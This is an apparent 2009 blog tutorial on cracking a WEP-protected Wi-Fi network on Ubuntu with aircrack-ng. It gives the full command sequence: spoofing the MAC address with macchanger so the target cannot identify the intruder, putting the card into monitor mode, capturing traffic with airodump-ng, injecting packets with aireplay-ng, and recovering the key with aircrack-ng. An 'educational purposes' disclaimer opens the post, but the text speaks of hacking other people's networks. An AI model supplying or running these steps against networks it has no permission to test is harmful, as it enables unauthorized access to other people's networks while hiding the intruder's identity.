Tuesday, October 13, 2009

Linux wep cracking

Written By Socrates, Lol no pictures But it is detailed and should work.


This is for educational purposes. I take no responsibility for the actions of others.:p

Ok this tutorial will teach you how to crack a wep using ubuntu 9.04 and aircrack-ng.

Follow these commands first open up a new terminal and type sudo apt-get install macchanger. Wait for this to finish downloading and installing, afterwards download sudo apt-get install aircrack-ng in the same terminal.

Alright for the rest of this tutorial you need to disable networking. After that is done open up a terminal and type:

Make sure to include your wireless cards name (mine was wlan0) yours might be different.

sudo airmon-ng stop wlan0

sudo ifconfig wlan0 down

Next you will need to change your maccadress so you whoever you are hacking doesn't know you are you Tongue. You can do this by typing:

sudo macchanger --mac 00:11:22:33:44:55 wlan0
Your mac address should say faked.

Next type

sudo airmon-ng start wlan0

Find the network and make sure it is WEP then locate the bssid and copy it also note the channel number or ch. Mine was 6 but yours might be different.

then type

sudo airodump-ng wlan0

you should see the networks name and it's data. Next open up new terminal and type:

sudo airodump-ng -c [channel] -w [filename] --bssid [bssid] wlan0

you should see something association successful with a smiley face. You need this to work!

next type:

sudo aireplay-ng -1 0 -a [bssid] -h [fake mac] mon0

sudo aireplay-ng -3 -b [bssid] -h [fake mac] wlan0

Now you should see a lot of packets. You will need a certain amount of these before you can crack the pass.

After you reach about 5,000 packets or higher type aircrack-ng -b [bssid] [filename]-01.cap


If the injection was successful it will say decrypted 100% and then the pass. If the pass is 78:90:798:789: then it would be 7890798798 with no semicolons . Tongue

No comments:

Post a Comment